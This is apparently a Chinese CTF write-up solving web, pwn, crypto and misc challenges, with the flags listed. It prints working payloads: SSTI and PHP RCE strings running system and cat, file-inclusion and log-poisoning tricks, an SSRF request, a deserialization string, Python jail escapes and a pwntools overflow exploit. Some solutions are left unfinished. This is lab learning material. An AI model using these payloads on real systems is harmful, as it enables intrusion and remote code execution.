WEB
[Week1]easy_html
COOKIE有路径,访问得到一个页面
但是发现只能输进去十位,bp抓包随便十一位得到flag
NSSCTF{2f68a13b-427c-42ab-9c3a-ca7f7caa0361}
[Week1]Interesting_include
题目如下
<?php
//WEB手要懂得搜索
//flag in ./flag.php
if(isset($_GET['filter'])){
$file = $_GET['filter'];
if(!preg_match("/flag/i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
文件包含,直接base64读文件即可
php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。
<?php
$flag = 'flag=NSSCTF{c7f78e2c-ae99-4e41-af41-926dcad08a16}';
?>
[Week1]Interesting_http
首先是post传参
然后want=flag需要admin验证,改cookie
然后是本地验证,加xff
NSSCTF{3caa079f-e3c5-4198-a26e-72c82617dea0}
[Week1]2048
游戏题,考察js泄露
直接找就找到flag了
NSSCTF{53160c888e25c3f828b23e316a7ae083}
[Week1]easy_upload
直接上传个马
NSSCTF{95a44373-0b8f-4f8e-9a8f-29b807bb9e4d}
[Week1]What is Web
扫目录发现/flag.php,没个卵用,抓包得到flag,就在源码里
NSSCTF{Hell0_Weber_Wec0m3_come_2_web_w0r1d!}
[WEEK2]ez_SSTI
基础ssti
{{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20flag%27).read()%20}}
NSSCTF{1d65a989-f8e6-4bcb-8172-bf47a66e9010}
[WEEK2]easy_include
题目如下
<?php
//WEB手要懂得搜索
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|flag|data|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=/i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
可以访问代表可以访问内网文件,访问日志文件
基本思路就出来了,包含nginx日志,UA写🐎即可
NSSCTF{f91ead3d-322d-408c-944f-7726371b69b1}
[WEEK2]Canyource
题目如下
<?php
highlight_file(__FILE__);
if(isset($_GET['code'])&&!preg_match('/url|show|high|na|info|dec|oct|pi|log|data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['code'])){
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
eval($_GET['code']);}
else
die('nonono');}
else
echo('please input code');
?> please input code
就是绕过过滤执行eval函数
?code=eval(end(current(get_defined_vars())));&a=system('ls;pwd');
然后cat,tac,nl,tail都被过滤了,读不了flag
用base64可读
Are you kinding me?<?php $flag="NSSCTF{d31fe1bf-39c6-46b5-a197-4f1ff6ddc1ad}"
NSSCTF{d31fe1bf-39c6-46b5-a197-4f1ff6ddc1ad}
[WEEK2]ez_ssrf
主要代码如下
<?php
highlight_file(__FILE__);
error_reporting(0);
$data=base64_decode($_GET['data']);
$host=$_GET['host'];
$port=$_GET['port'];
$fp=fsockopen($host,intval($port),$error,$errstr,30);
if(!$fp) {
die();
}
else {
fwrite($fp,$data);
while(!feof($data))
{
echo fgets($fp,128);
}
fclose($fp);
}
[Week1]Challenge__rce(复现)
hint:灵感来源于ctfshow吃瓜杯Y4大佬的题
?hint
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"/>
<title>Challenge_rce</title>
<link rel="stylesheet" type="text/css" href="./css/index.css"/>
</head>
<body>
<!--?hint-->
</body>
</html>
<?php
error_reporting(0);
if (isset($_GET['hint'])) {
highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
$rce = $_POST['rce'];
if (strlen($rce) <= 120) {
if (is_string($rce)) {
if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
eval($rce);
} else {
echo("Are you hack me?");
}
} else {
echo "I want string!";
}
} else {
echo "too long!";
}
}
题目源码给了
是吃瓜杯的题目Shellme_Revenge的一小部分
测试一下可用符号
<?php
for($a = 0; $a < 256; $a++){
if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", chr($a))){
echo chr($a)." ";
}
}
?>
可用符号还有
$ ( ) + , . 0 1 2 3 4 5 6 7 8 9 ; = [ ] _ { }
无参rce,无疑了,到这里思路就断了,后来看佬的wp发现是使用自增rce,这里引用佬的一段解释吧
$_=[]._;$__=$_[1];$_=$_[0];$_++;$_1=++$_;$_++;$_++;$_++;$_++;$_=$_1.++$_.$__;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);
GET
?1=system&2=ls
POST
rce=%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B
NSSCTF{02fdf7f1-a59e-4c6b-84ff-1bfc039671c5}
[WEEK2]ez_ssrf(复现)
访问/index.php
题目名字就很明确是ssrf了,但是当时直接摆烂了
<?php
highlight_file(__FILE__);
error_reporting(0);
$data=base64_decode($_GET['data']);
$host=$_GET['host'];
$port=$_GET['port'];
$fp=fsockopen($host,intval($port),$error,$errstr,30); // 传过去需要等待三十秒
if(!$fp) {
die();
}
else {
fwrite($fp,$data);
while(!feof($data))
{
echo fgets($fp,128);
}
fclose($fp);
}
socket伪造http请求ssrf
GET /flag.php HTTP/1.1
Host: 43.143.195.203
Connection: Close
base64编码
R0VUIC9mbGFnLnBocCBIVFRQLzEuMQpIb3N0OiA0My4xNDMuMTk1LjIwMwpDb25uZWN0aW9uOiBDbG9zZQ==
?data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQpIb3N0OiA0My4xNDMuMTk1LjIwMwpDb25uZWN0aW9uOiBDbG9zZQ==&host=43.143.195.203&port=5000
发现带不出来,那就试试题目ip
R0VUIC9mbGFnLnBocCBIVFRQLzEuMQpIb3N0OiA0My4xNDMuNy45NwpDb25uZWN0aW9uOiBDbG9zZQ==
?data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQpIb3N0OiA0My4xNDMuMTk1LjIwMwpDb25uZWN0aW9uOiBDbG9zZQ==&host=43.143.7.97&port=5000
题目ip也不行需要是127的
GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close
R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=
nssctf{095948b9b2be-8444-3750-99ba94d3b4f5}
[WEEK2]easy_unser(复现)
题目如下
<?php
include 'f14g.php';
error_reporting(0);
highlight_file(__FILE__);
class body{
private $want,$todonothing = "i can't get you want,But you can tell me before I wake up and change my mind";
public function __construct($want){
$About_me = "When the object is created,I will be called";
if($want !== " ") $this->want = $want;
else $this->want = $this->todonothing;
}
function __wakeup(){
$About_me = "When the object is unserialized,I will be called";
$but = "I can CHANGE you";
$this-> want = $but;
echo "C1ybaby!";
}
function __destruct(){
$About_me = "I'm the final function,when the object is destroyed,I will be called";
echo "So,let me see if you can get what you want\n";
if($this->todonothing === $this->want)
die("鲍勃,别傻愣着!\n");
if($this->want == "I can CHANGE you")
die("You are not you....");
if($this->want == "f14g.php" OR is_file($this->want)){
die("You want my heart?No way!\n");
}else{
echo "You got it!";
highlight_file($this->want);
}
}
}
class unserializeorder{
public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!<BR>";
function __sleep(){
$About_me = "When the object is serialized,I will be called";
echo "We Come To HNCTF,Enjoy the ser14l1zti0n <BR>";
}
function __toString(){
$About_me = "When the object is used as a string,I will be called";
return $this->CORE;
}
}
$obj = new unserializeorder();
echo $obj;
$obj = serialize($obj);
if (isset($_GET['ywant']))
{
$ywant = @unserialize(@$_GET['ywant']);
echo $ywant;
}
?>
人类最大的敌人,就是无序. Yahi param vaastavikta hai!
We Come To HNCTF,Enjoy the ser14l1zti0n
考察php反序列化
目标就是这里
传入的变量需要new一个新的body类
并且不能触发wakeup魔法函数,这个地方容易绕过.类中传入参数数量大于实际参数数量即可
其次还需要绕过这个条件
if($this->want == "f14g.php" OR is_file($this->want))
1.伪协议ls_file检测是除了file外的伪协议都是false
2.使用假目录 ./false/…f14g.php
<?php
class body{
private $want,$todonothing = "i can't get you want,But you can tell me before I wake up and change my mind";
public function __construct($want){
//$this->want = "php://filter/convert.base64-encode/resource=f14g.php";
$this ->want = "./a/../f14g.php";
$this ->todonothing = "22";
}
}
$huang = new body();
echo(urlencode(serialize($huang)));
?>
//O%3A4%3A%22body%22%3A2%3A%7Bs%3A10%3A%22%00body%00want%22%3Bs%3A15%3A%22.%2Fa%2F..%2Ff14g.php%22%3Bs%3A17%3A%22%00body%00todonothing%22%3Bs%3A2%3A%2222%22%3B%7D
O:4:"body":2:{s:10:"bodywant";s:15:"./a/../f14g.php";s:17:"bodytodonothing";s:2:"22";}
O:4:"body":3:{s:10:"bodywant";s:15:"./a/../f14g.php";s:17:"bodytodonothing";s:2:"22";}
NSSCTF{b94b585e-b632-4ddd-9e91-eb77d89bc75e}
[WEEK3]ssssti
显然存在ssti
fuzz发现过滤了如下
'
"
_
args
os
不允许post
使用request.cookies构造上述的payload
?name={{self[request.cookies.c][request.cookies.d][request.cookies.e][request.cookies.f][request.cookies.g].open(request.cookies.z).read()}}
cookie:c=__dict__;d=_TemplateReference__context;e=lipsum;f=__globals__;g=__builtins__;z=flag
NSSCTF{c29e448f-55f7-4d9f-9d36-282a0e14d0e0}
PWN
[Week1]easync
两段flag,一个在nothing,一个在gift
nssctf{Nc_@nd_g3t5h31L}
[Week1]easyoverflow
基础栈溢出漏洞
exp
from pwn import *
#p = process('./easy_overflow')
p = remote('43.143.7.97',28094)
pay= b'a'*54+p64(0x401214)
p.sendline(pay)
p.interactive()
nssctf{0h_You_OverFl0w_the_pr0gr@mm}
[WEEK2]ret2text
ret2text hint:远程环境存在栈对齐的问题(栈对齐是什么百度搜索) hint:试试partial overwrite绕过PIE
花式栈溢出,不会
CRYPTO
[Week1]baBAbaseSEse
base套娃
92-91-85-64-32–hex
NSSCTF{th3re_1s_als0_b4se_36_45_58_62_100}
[Week1]你想学密码吗?
# encode = utf-8
# python3
# pycryptodemo 3.12.0
import Crypto.PublicKey as pk
from hashlib import md5
from functools import reduce
a = sum([len(str(i)) for i in pk.__dict__])
funcs = list(pk.__dict__.keys())
b = reduce(lambda a,b:a+b,[str(i) for i in funcs])
f = md5(b.encode()).hexdigest()
print('NSSCTF{' + f + '}')
NSSCTF{11db81a49b1826a3be8fb33f8ccb496d}
[Week1]baby_rsa
from Crypto.Util.number import bytes_to_long, getPrime
from gmpy2 import *
from secret import flag
m = bytes_to_long(flag)
p = getPrime(128)
q = getPrime(128)
n = p * q
e = 65537
c = pow(m,e,n)
print(n,c)
# n=62193160459999883112594854240161159254035770172137079047232757011759606702281
# c=17331436837911040930486942133359735652484926528331507431552667656734821231501
知道n,c,e
n分解p,q
p = 234560843346150602519484260867514743467
q = 265147241000574873803071047177766359643
import libnum
from Crypto.Util.number import long_to_bytes
n=62193160459999883112594854240161159254035770172137079047232757011759606702281
c=17331436837911040930486942133359735652484926528331507431552667656734821231501
#n = int("",16)
e = 65537
#e = int("",16)
p = 234560843346150602519484260867514743467
q = 265147241000574873803071047177766359643
d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n) # m 的十进制形式
string = long_to_bytes(m) # m明文
print(string) # 结果为 b‘ m ’ 的形式
NSSCTF{Welc0m3_t0_7h3_RSA_w0r1d}
[WEEK2]RSA again
题目如下
from Crypto.Util.number import *
from secret import flag
pad = lambda x:x + bytes([16 - len(x)%16] * (16 - len(x)%16))
m = bytes_to_long(pad(flag))
p = getPrime(1024)
q = getPrime(1024)
r = getPrime(1024)
s = getPrime(1024)
n1 = p*q
n2 = r*s
e1 = 0x3
e2 = 0x10001
c1 = pow(m,e1,n1)
c2 = pow(m,e2,n2)
print(f'n1 = {n1}')
print(f'n2 = {n2}')
print(f'e1 = {e1}')
print(f'e2 = {e2}')
print(f'c1 = {c1}')
print(f'c2 = {c2}')
'''
n1 = 19920284552214772740140135352548541831031690920425912140961436065508824546041514076016684238261995522677433833330399269923572993489681770913908642529489382472548548664350078176417366141695108301338793624641102311886122714705781923892243561473766978666116035403145672686443197319003393949350402512739343998236331447680561106899174404316265329944969786438022711742891334905159259854026408058542492105569778656883811323759583727586331462200020945101286801110840081277963013591342157754264111051785385892113635682519079401538045775697382691195557344630571694510115674941400112478156619785019370731073096018975390492287333
n2 = 16329690193309629244191723145720681753145067517963214005637012320130767690248475184382159868590994476900972592910808281306311987027465355492106975220876976952805197358639881107619560544543352300924359258546945240852850094015390140482140815264345348655887196971643211396274684514779113163628885090661524523232327450873503097327714815509514869056066300689707819915660849896274673178482085029145101175879255721581466301617903290840675945809027289325795423671263820619585424051649443606301277124322653881307702397752575258862656767834175467463999624688529625582031941402015943516022965802189663157681884162493551612612033
e1 = 3
e2 = 65537
c1 = 1752041777918702842605810950957832076618830231626916748933875881505173164404519153781007066742915517004902508987841695668088780745675304779496841107726530280651344357647334690721873124324358539328142005709830859468027528835981960873390785515876157664035579935532043154959183555353553164481674735512873428044452976229459806219115571797514157279125
c2 = 13118485959563304540673377439664643422000629435115361166348221705991314239675693340024813013156594762061646798463551395329521013651893257141697813554253378348002502855822191264845788826850528723400519059095869424931054523865083127809240502348046515579012160733570975234405522250330692499687684922633627550243811524972452606330768418753137605045204137872122584136368073471612976975360656501198000053578279110813009137808852376287556012668702182416374333935081007133880603708035832346742292444210108820267460698390600228183548619401334969739679892562475501201965275739796687679445529050630235296740377171065357995433586
'''
两道rsa,第一个是小e攻击
但是n很大,yafu分解
[WEEK2]strange RSA
from Crypto.Util.number import *
from secret import flag
pad = lambda x:x + bytes([16 - len(x)%16] * (16 - len(x)%16))
m = bytes_to_long(pad(flag))
p = getPrime(100)
q = getPrime(100)
n = p*p*q*q
e = 0x10001
c = pow(m,e,n)
print(f'n = {n}')
print(f'c = {c}')
print(f'e = {e}')
'''
n = 564070152909085514893862673848191100242629745476416876533996976389897932324860687952230733393080567203972999049426141761
c = 269509453821913281608300827585653465889617103481995203776655691658799441157871331220899710463748827149644657719450056013
e = 65537
'''
直接yafu分解
P30 = 709662686105519282917793669093
P30 = 709662686105519282917793669093
P31 = 1058314117179226194777612760717
P31 = 1058314117179226194777612760717
然后一把梭
ps:做题目一定要看清题,我刚开始以为就是正常的n,但是咋梭都出不来,后来再回来一看,n = ppq*q,,,,,我醉了
p,q真实的值应该是开根之后
不对,这题我不会,哪位师傅留个言带带我
[WEEK2]md5太残暴了
题目如下
小明养成了定期修改密码的好习惯,同时,他还是一个CTF爱好者。有一天,他突发奇想,用flag格式来设置密码,为了防止忘记密码,他还把密码进行了md5加密。为了避免被其他人看到全部密码,他还特意修改了其中部分字符为#。你能猜出他的密码吗?
plaintext = flag{#00#_P4ssw0rd_N3v3r_F0rg3t_63####}
md5 = ac7f4d52c3924925aa9c8a7a1f522451
PS: 第一个#是大写字母,第二个#是小写字母,其他是数字。
就是爆破呗,走起来
import hashlib
from turtle import right
for g in range(ord('a'),ord('z')):
for f in range(10):
for e in range(10):
for d in range(10):
for c in range(10):
for h in range(ord('A'),ord('Z')):
for g in range(ord('a'),ord('z')):
#for b in range(9):
#for a in range(9):
num="flag{"+chr(h)+"00"+chr(g)+"_P4ssw0rd_N3v3r_F0rg3t_63"+str(f)+str(e)+str(d)+str(c)+'}'
num_sha = hashlib.md5(num.encode('utf-8')).hexdigest()
#print(num_sha)
print(num)
#print(num_sha)
right = "ac7f4d52c3924925aa9c8a7a1f522451"
#right = "f96d6e5d801f825d8f93aa7ed9e3922b"
if(num_sha == right):
print(num)
print('success!!!')
print('right flag!!!')
exit()
静静等待然后就出了,二十分钟,不多不少刚刚好
flag{G00d_P4ssw0rd_N3v3r_F0rg3t_638291}
[WEEK2]hash
大同小异
把上题的脚本浅浅改一下就可以用了
import hashlib
from turtle import right
#for g in range(ord('a'),ord('z')):
for f in range(66,122):
for e in range(66,122):
for d in range(66,122):
for c in range(66,122):
#for h in range(ord('A'),ord('Z')):
#for g in range(ord('a'),ord('z')):
#for b in range(9):
#for a in range(9):
num=chr(f)+chr(e)+chr(d)+chr(c)+'PR6o0VJVhOvrobcr'
num_sha = hashlib.sha256(num.encode('utf-8')).hexdigest()
#print(num_sha)
print(num)
#print(num_sha)
right = "b5d2e3943477e375bcd11a7af6f68c3973690a888333afff3f048fc5ba598029"
#right = "f96d6e5d801f825d8f93aa7ed9e3922b"
if(num_sha == right):
print(num)
print('success!!!')
print('right flag!!!')
exit()
远程交互
NSSCTF{ne4cat_1s_nece55arY_4nd_usefu1}
MISC
[Week1]简单编码
得到一个图片,url解码—>base64解码—>二进制转str得到flag
nssctf{nssctf_huanyingni}
[Week1]calc_jail_beginner(JAIL)
附件如下
#Your goal is to read ./flag.txt
#You can use these payload liked `__import__('os').system('cat ./flag.txt')` or `print(open('/flag.txt').read())` // hint
WELCOME = '''
_ ______ _ _ _ _
| | | ____| (_) | | (_) |
| |__ | |__ __ _ _ _ __ _ __ ___ _ __ | | __ _ _| |
| '_ \| __| / _` | | '_ \| '_ \ / _ \ '__| _ | |/ _` | | |
| |_) | |___| (_| | | | | | | | | __/ | | |__| | (_| | | |
|_.__/|______\__, |_|_| |_|_| |_|\___|_| \____/ \__,_|_|_|
__/ |
|___/
'''
print(WELCOME)
print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
print('Answer: {}'.format(eval(input_data))) // 即执行eval
__import__('os').system('cat flag')
NSSCTF{e3b53834-6ee0-4ccf-9f1a-9ef3a0941127}
[Week1]piz.galf
打开附件发现内容是颠倒的
用两次这样的脚本
with open('pmb.galf','rb') as f:
with open('flag.bmp','wb') as g:
g.write(f.read()[::-1])
得到flag
NSSCTF{d1r0w_0ll3h}
[Week1]my_png
藏了个压缩包,压缩包提示密码纯四位数字,直接掩码爆破
解压得到flag
NSSCTF{welc0me_t0_StegAn0graphY!!!}
[Week1]python2 input(JAIL)
# It's escape this repeat!
WELCOME = '''
_ _ ___ ___ _____ _ _ _
| | | | / _ \ |__ \ |_ _| | | | | |
_ __ _ _| |_| |__ | | | |_ __ ) | | | _ __ _ __ | | | | |_
| '_ \| | | | __| '_ \| | | | '_ \ / / | | | '_ \| '_ \| | | | __|
| |_) | |_| | |_| | | | |_| | | | |/ /_ _| |_| | | | |_) | |__| | |_
| .__/ \__, |\__|_| |_|\___/|_| |_|____| |_____|_| |_| .__/ \____/ \__|
| | __/ | | |
|_| |___/ |_|
'''
print WELCOME
print "Welcome to the python jail"
print "But this program will repeat your messages"
input_data = input("> ")
print input_data
同上
NSSCTF{59945ba1-dea5-4c42-9f20-5f003b9c0eb4}
[Week1]三生三世
附件是一个加密的压缩包,没有任何提示,凭直觉一点一点掩码爆破测试,得到密码xilan
得到

显然base64转图片得到二维码
扫码得到密文flag
nc{lmTnc}stWceostsfeo__sf
栅栏密码解码,3
nssctf{Welcome_To_nssctf}
[Week1]calc_jail_beginner_level1
题目附件如下
#the function of filter will banned some string ',",i,b
#it seems banned some payload
#Can u escape it?Good luck!
def filter(s):
not_allowed = set('"\'`ib')
return any(c in not_allowed for c in s)
WELCOME = '''
_ _ _ _ _ _ _ __
| | (_) (_) (_) | | | | /_ |
| |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| || |
| '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ || |
| |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ || |
|_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_||_|
__/ | _/ |
|___/ |__/
'''
print(WELCOME)
print("Welcome to the python jail")
print("Let's have an beginner jail of calc")
print("Enter your expression and I will evaluate it for you.")
input_data = input("> ")
if filter(input_data):
print("Oh hacker!")
exit(0)
print('Answer: {}'.format(eval(input_data)))
暂时没绕过去
[WEEK2]扫不出来的二维码
附件是一个二维码
扫码之后又是个附件
附件里是个pdf文件,但是打不开发现是压缩包,解压之后得到一个二维码
在线二维码扫描得到密文flag
Online Barcode Scanner | Barcode Reader SDK | Dynamsoft
base64解码得到flag
nssctf{I_h0te_the_QRc0de!!!}
[WEEK2]ez_flow
流量文件分析,一个一个找,最终找到flag在login.php
NSSCTF{Hacker!!!_Y0u_g3t_nny_f10w}
[WEEK2]ex_word
拿到附件是一个word,不能正常打开,改成zip解压看看,发现在images下有个图片不能把正常显示,显示二进制发现是PK,即压缩包
改了之后里面有个flag.xml打开是emoji
解码得到flag
Emoji表情符号编码/解码 - 一个工具箱 - 好用的在线工具都在这里! (atoolbox.net)
nssctf{t01s_1s_th0_tru3_f1ag}
[WEEK2]Kiana
两张图片
stegsolve异或对比,得到flag
NSSCTF{come_and_play_bh3}